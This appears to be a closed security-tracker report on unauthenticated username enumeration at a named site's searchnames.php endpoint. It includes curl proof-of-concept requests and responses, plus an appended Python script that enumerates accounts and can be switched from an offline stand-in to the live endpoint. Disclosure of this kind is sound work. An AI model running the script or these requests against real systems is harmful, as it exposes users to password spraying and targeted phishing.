Task 329 | Status: Closed | Summary: Unauthenticated Username Enumeration | Opened by: hellofresh01

1. Executive Summary
During a security assessment of the security.alwaysdata.com infrastructure, a medium-severity vulnerability was identified in the user registration/validation logic. An unauthenticated endpoint allows for the systematic enumeration of valid usernames. This information disclosure can be leveraged by malicious actors to conduct targeted brute-force attacks, credential stuffing, or sophisticated social engineering campaigns.

2. Vulnerability Information
Field                Details
Vulnerability Type   Information Exposure (Username Enumeration)
Severity             Medium
Status               Open (as reported; the tracker entry is now Closed)
Affected Component   searchnames.php
Vector               Network / Web API

3. Technical Analysis
Root Cause
The endpoint searchnames.php is designed to provide real-time feedback during the account creation process. However, the root cause of the issue is twofold:

Lack of Authentication: The endpoint is accessible to any unauthenticated user or automated script.

Differential Responses: The server answers with two distinguishable strings, "true" when the name is free and "false|<message>" when it is already registered, so the response body is a direct yes/no oracle for account existence.

Vulnerability Details
File Source: https://security.alwaysdata.com/js/functions.js

Endpoint: https://security.alwaysdata.com/js/callbacks/searchnames.php

Parameter: name

4. Proof of Concept (PoC)
The following curl commands, sent without any session cookie or credentials, show that the response body alone reveals whether an account exists.

Test 1: Existing Username (admin)
Bash

curl -s "https://security.alwaysdata.com/js/callbacks/searchnames.php?name=admin"

Response:

false|That username is already taken. You will need to choose another one.

Test 2: Non-Existent Username
Bash

curl -s "https://security.alwaysdata.com/js/callbacks/searchnames.php?name=admin123456789"

Response:

true

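A scripted form of the PoC, added here as an example and not part of the original report: it parses the two response shapes shown above, first checks that a random name still comes back "true" (so a later change to a generic message is not misread as "every name exists"), and then runs a candidate list through the oracle. Only fetch_live reaches the real endpoint; fake_fetch and the two accounts it knows are a constructed offline stand-in, not observed data.

```python
"""Enumerate usernames through the searchnames.php true / false| oracle."""
import random
import string
import time
from urllib.parse import quote
from urllib.request import urlopen

ENDPOINT = "https://security.alwaysdata.com/js/callbacks/searchnames.php"

TAKEN_PREFIX = "false|"   # shape observed in the PoC for an existing account
AVAILABLE = "true"        # shape observed in the PoC for a free name


def classify(body: str) -> str:
    """Map a raw response body to 'taken', 'available' or 'unknown'.

    Anything that matches neither observed shape (an error page, a
    rate-limit response, an empty body) is reported as 'unknown' rather
    than silently counted as one of the two classes.
    """
    body = body.strip()
    if body == AVAILABLE:
        return "available"
    if body.startswith(TAKEN_PREFIX):
        return "taken"
    return "unknown"


def fetch_live(name: str, timeout: float = 10.0) -> str:
    """Query the real endpoint (network access required)."""
    with urlopen(f"{ENDPOINT}?name={quote(name)}", timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def random_name(length: int = 24) -> str:
    """A name that is, for practical purposes, certain not to be registered."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(random.choice(alphabet) for _ in range(length))


def calibrate(fetch) -> bool:
    """Confirm the oracle still behaves as expected before trusting it.

    A random name must come back 'available'; if it does not, the endpoint
    has changed and any 'taken' verdicts would be meaningless.
    """
    return classify(fetch(random_name())) == "available"


def enumerate_users(candidates, fetch, delay: float = 0.0) -> dict:
    """Return {candidate: verdict}, pacing requests by `delay` seconds."""
    results = {}
    for name in candidates:
        results[name] = classify(fetch(name))
        if delay:
            time.sleep(delay)
    return results


def valid_users(results: dict) -> list:
    """Names the oracle reported as existing accounts, sorted."""
    return sorted(n for n, v in results.items() if v == "taken")


# Constructed offline stand-in for the endpoint (assumed accounts, not real data).
_FAKE_ACCOUNTS = {"admin", "support"}


def fake_fetch(name: str) -> str:
    """Mimic the two response shapes seen in the PoC above."""
    if name in _FAKE_ACCOUNTS:
        return "false|That username is already taken. You will need to choose another one."
    return "true"


if __name__ == "__main__":
    # Replace fake_fetch with fetch_live to run against the real endpoint.
    if not calibrate(fake_fetch):
        raise SystemExit("oracle did not behave as expected; aborting")
    verdicts = enumerate_users(["admin", "support", "admin123456789"], fake_fetch)
    print(valid_users(verdicts))   # ['admin', 'support']
```

The "unknown" class matters in practice: once the server starts rate-limiting or returns an error page, a naive true/false split would misfile every remaining candidate, so the script refuses to count anything that does not match one of the two observed shapes.
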
5. Impact
Targeted Attacks: Attackers can build a list of valid users to perform password spraying or brute-force attacks.

Social Engineering: Knowledge of valid usernames facilitates more convincing phishing attempts against specific employees or users.
